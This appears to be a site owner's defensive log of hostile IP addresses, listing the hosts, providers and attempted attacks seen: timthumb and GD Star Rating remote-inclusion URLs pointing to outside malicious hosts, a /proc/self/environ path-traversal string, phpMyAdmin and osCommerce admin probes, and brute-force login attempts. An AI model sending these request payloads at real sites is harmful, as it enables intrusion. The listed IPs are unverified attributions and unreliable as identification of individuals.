UA: gsa-crawler (Enterprise; GID-01422; jplastiras.com)
Mail Server / Dictionary Attacker
Attempted WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=shell.php
198.24.138.51 Company: United States – Phoenix Secured Servers Llc Comment Spammer
Found Honeypot Trap file
ANOTHER Phoenix Secured Servers Llc BAD IP
80.81.183.2 Hostname: dl17.ymgg.us
Company: Finland – Helsinki Elisa Oyj
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
91.194.72.17 see next Hostname: cpanel.onetelecom.od.ua
Company: Ukraine Odessa One Telecom Ltd
Suspected attempt to attack database
[DOMAIN]/dump
94.23.246.109 Hostname: ks367729.kimsufi.com
Company: France Roubaix Ovh Sas
Daily attempt on wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
173.0.137.76 Company: United States – Orlando Apyl Inc Mail server, Dictionary attacker, Bad web host
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/file_manager.php/login.php
192.119.144.68 Company: United States – Dallas Paige Chen Comment Spammer
108.171.255.203 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Comment Spammer
146.185.18.82 Hostname: customer.golifeinsurancepro.com
Company: United Kingdom – London Hosting Services Inc
Attempting uploadify exploit –
from folder requests this looks like an attack against Drupal
/modules/pm_advancedsearch4/js/uploadify/uploadify.css?
/js/jquery.uploadify-v2.1.0/uploadify.css?
/scripts/uploadify/uploadify.css?
182.132.74.122 Company: China – Chengdu Chinanet Sichuan Province Network
UA: Python-urllib/2.7
PHP Hack attempt:
/phpMyAdmin/scripts/setup.php
91.231.40.27 Company: Ukraine – Rivne Fop Chaliy Igor Petrovich Comment Spammer
108.171.246.242 Hostname: b2-10.unixbsd.info
Company: United States – New York City Psychz Networks
Hacker:
/include/config.php../../../../../../../../../../../../../../../../../../../../../../../..//
proc/self/environ%0000
Mail Server
BAD HOST
74.200.83.241 Hostname: unknown241.83.200.74.defenderhosting.com
Company: United States – Ashburn Virtacore Systems Inc
Hacker:
/include/config.php../../../../../../../../../../../../../../../../../../../../../../../..
//proc/self/environ%0000
198.24.138.52 Company: United States – Phoenix Secured Servers Llc Comment Spammer
Found Honeypot Trap file
BAD HOST: Phoenix Secured Servers Llc
216.99.157.202 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Probing for folder contents – URL/index.php
Comment Spammer
61.135.242.229 see next Company: China Beijing Cea Edu Attempted admin hack:
/phpMyAdmin/scripts/setup.php
Mail Server, Dictionary Attacker, Comment Spammer
221.206.105.219 Company: China Harbin China Unicom Heilongjiang Province Network Comment Spammer
85.25.143.216 Hostname: golfmail.digital-worx.de
Company: Germany Frankfurt Am Main Intergenia Ag
Attempted timthumb exploit:
/wp-content/themes/blacklabel/framework/timthumb.php?src=
//wp-content/themes/blacklabel/framework/timthumb.php?
src=http: //wordpress.com.sexdraw.com/cgi-bin.php
91.149.157.131 Hostname: vh29.hoster.by
Company: Belarus Minsk Mobile Service Ltd.
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php?
src=http: //wordpress.com.nurqaseh.org/cur.php
142.0.131.145 Company: China Anxin Comment Spammer
41.249.8.30 Company: Morocco Rabat Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Mail Server, Dictionary Attacker, Comment Spammer
213.187.93.27 Hostname: serv38.loswebos.de
Company: Germany – Leipzig Hl Komm Telekommunikations Gmbh
Attempted WordPress GD Star Rating plugin and timthumb exploit
/wp-content/gd-star-rating/thumb.php?
src=http %3A%2F%2Fflickr.com.jpginnovations.com%2Fbad.php
121.251.254.213 Company: China – Qingdao University Of Petroleum (east China) Qingdao Campus Comment Spammer
Found Honeypot Trap files
69.147.240.50 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Trying to register on restricted site
189.27.185.185 Hostname: 189.27.185.185.dynamic.adsl.gvt.net.br
Company: Brazil – Sao Paulo Global Village Telecom
Looking for /mobiquo/mobiquo.php
81.203.104.242 Hostname: 81.203.104.242.dyn.user.ono.com
Company: Spain – Basauri Cableuropa S.a.u.
Mail Server
Comment Spammer:
direct request for /wp-comments-post.php
93.152.163.173 Hostname: 93-152-163-173.ddns.onlinedirect.bg
Company: Bulgaria – Sofia Online Direct Ltd
Mail Server
Tried to register on restricted site
173.212.198.45 Hostname: 173-212-199-45.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Known UAs:
Mozilla/5.0 usww.com-Spider-for-w8.net
Mozilla/5.0 (compatible; BanBots/2.0b; Fetch; +http: //www.banbots.com)
Comment Spammer.
direct request for /wp-comments-post.php
Faked referrer
208.100.18.217 Hostname: 173-212-199-45.hostnoc.net
Company: United States – Chicago Steadfast Networks
Tried to register on restricted site
147.255.128.232 Hostname: 147.255.128.232.rdns.ubiquity.io
Company: United States – Cheyenne Cloudradium L.l.c
Tried to register on restricted site
/forum/user/register
216.152.252.43 Hostname: unknown.xeex.net
Company: United States – Santa Monica Xeex
Comment Spammer
219.234.82.63 Company: China – Beijing Beijing New-billion Telecom Technology Co. Ltd Tried to register on restricted site
/user/register
210.22.73.146 Company: China – Shanghai Ziyuwangluo Tried to register on restricted site
/user/register
217.64.195.242 Hostname: w-14.th.seeweb.it
Company: Italy Frosinone Seeweb S.r.l.
Attempted timthumb exploit:
/wordpress-timthumb-files-updated/wp-content/
plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?
src=http%3A%2F%2Fflickr.com.beatmaking-soft
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php
?src=http: //flickr.com.mercadodecorotos.com/index.php
173.166.213.185 Hostname: 173-166-213-185-memphis.hfc.comcastbusiness.net
Company: United States Meridian Private Customer
Comment Spammer.
direct request for /wp-comments-post.php
no referrer
125.160.44.126 Hostname: 126.subnet125-160-44.speedy.telkom.net.id
Company: Indonesia – Balikpapan Pt Telkom Indonesia
Mail Server, Dictionary Attacker
Tried to register on restricted site
/user/register
/?q=user/register
194.71.224.71 Company: Sweden – Stockholm Resilans Ab Tried to register on restricted site
/user/register
/?q=user/register
64.87.61.214 Hostname: 64.87.61.214.rdns.ubiquityservers.com
Company: United States Grand Prairie Colocateusa
Tried to register on restricted site
/user/register
/?q=user/register
218.25.59.1 Company: China – Shenyang China Unicom Liaoning Province Network Comment Spammer
Found Honeypot Trap file
187.45.250.69 Hostname: l50cnn0632.locaweb.com.br
Company: Brazil – Sao Paulo Locaweb Servicos De Internet S/a
Attempted timthumb exploit:
/wp-content/plugins/cms-pack/timthumb.php?
src=http: //img.youtube.com.toptutor.hk/upload.php
46.45.169.54 Hostname: 46-45-169-54.turkrdns.com
Company: Turkey – Istanbul Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti.
Attempted timthumb exploit:
/wp-content/plugins/cms-pack/timthumb.php?
src=http: //img.youtube.com.toptutor.hk/upload.php
91.142.223.17 Hostname: excesomedia.vservers.es
Company: Spain – Malaga Axarnet Comunicaciones Sl
Attempted wpOnlineStore/osCommerce/Zencart exploit – Brute Force attack
/admin/banner_manager.php/login.php
/security/admin/file_manager.php/login.php
/admin/file_manager.php/login.php
/admin/categories.php/login.php
112.78.183.96 Company: Indonesia Jakarta Cloud Computing Biznet Attempted wpOnlineStore/osCommerce/Zencart exploit – Brute Force attack
/admin/banner_manager.php/login.php
/security/admin/file_manager.php/login.php
/admin/file_manager.php/login.php
/admin/categories.php/login.php
173.242.119.7 Company: United States – Scranton Volumedrive Comment Spammer
Tried to register on restricted site
/user/register
/?q=user/register
109.104.88.243 Hostname: ds7962.dedicated.turbodns.co.uk
Company: United Kingdom Derby Webfusion Internet Solutions
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?
src=http: //blogger.com.apishmedya.com/scan/eidraw.php
222.231.0.163 Company: Korea, Republic Of – Seoul Korea Internet Data Center
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/categories.php/login.php
190.187.3.203 Company: Peru – Lima Americatel Peru S.a.
Spam Harvester
Crawling for contact forms and forums
8.8.244.236 Company: United States – Omaha Level 3 Communications Inc.
Tried to register on restricted site
/user/register
/?q=user/register
219.137.253.86 Hostname: 86.253.137.219.broad.gz.gd.dynamic.163data.com.cn
Company: China – Guangzhou Chinanet Guangdong Province Network
Trying to register on restricted site
/blogs/load/recent
/index.php/forums/member/register
/register.php
/join.php
/account/register.php
/ucp.php?mode=register
/?page=login&cmd=register
/wp-login.php?action=register
/?s=Register
/tiki-register.php
199.102.44.41 Company: United States Shirley H4y Technologies Llc
Comment Spammer
Tried to register on restricted site
/user/register
/?q=user/register
91.215.216.37 Hostname: sky.icnhost.net
Company: Bulgaria – Plovdiv Internet Corporated Networks Ltd.
Mail Server
208.131.138.208 Hostname: 208.131.138.208.static.westdc.net
Company: United States New York City Westhost Inc.
Comment Spammer
204.16.241.28 Hostname: faucet.digitalpipes.com
Company: United States – Pittsburgh Teraswitch Networks Inc.
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php
?src=http: //img.youtube.com.toptutor.hk/upload.php
168.144.48.162 Hostname: vps-1024909-1835.manage.myhosting.com
Company: Canada – Toronto Softcom Technology Consulting Inc.
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php
?src=http: //img.youtube.com.toptutor.hk/upload.php
72.3.227.240 Hostname: www DOT mcompany.com
Company: United States – San Antonio Rackspace Host Routes
Attempted timthumb exploit:
//wp-content/themes/blacklabel/framework/timthumb.php
?src=http: //img.youtube.com.toptutor.hk/upload.php

BOTNET or HACKER GROUP

The following IPs were used simultaneously in brute-force/dictionary attacks on WordPress login:

Consider this botnet extremely dangerous

62.162.6.11 Registrar: Macedonia – The Former Yugoslav Republic Of Skopje Makedonski Telekom
Comment spammer – trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
190.223.53.70 Registrar: Peru Lima America Movil Peru S.a.c.
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
202.70.136.158 Registrar: Indonesia Jakarta Departemen Kesehatan
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
189.200.157.74 Hostname: customer-mred-74.static.metrored.net.mx
Registrar: Mexico – Mexico City Mexico Red De Telecomunicaciones S. De R.l. De C.v
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
190.95.206.254 Hostname: mail.coop23dejulio.fin.ec
Registrar: Ecuador – Guayaquil Telconet S.a
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
190.211.243.50 Hostname: newhost50.teisa.com.py
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
62.33.168.214 Hostname: 214.168.33.62.sekrd.ru
Registrar: Russian Federation – Moscow Transtelecom
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
RANGE 62.33.167.0 – 62.33.168.255 (RUSSIA) Banned
212.48.35.55 Registrar: Russian Federation – Moscow Mts Ojsc
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
RANGE 212.48.35.48 – 212.48.35.63 (RUSSIA) Banned
61.30.127.2 Hostname: 61-30-127-2.static.tfn.net.tw
Registrar: Taiwan Taipei Taiwan Fixed Network Co. Ltd.
Comment spammer/dictionary attacker/mail server
Trying to login to restricted WordPress site.
Using brute force/dictionary login attack from multiple IPs at once.
151.237.184.110 Company: Sweden – Stockholm Deepak Mehta Fie
Comment Spammer
81.44.245.224 Hostname: 224.Red-81-44-245.dynamicIP.rima-tde.net
Company: Spain – Madrid Telefonica De Espana Sau
Comment Spammer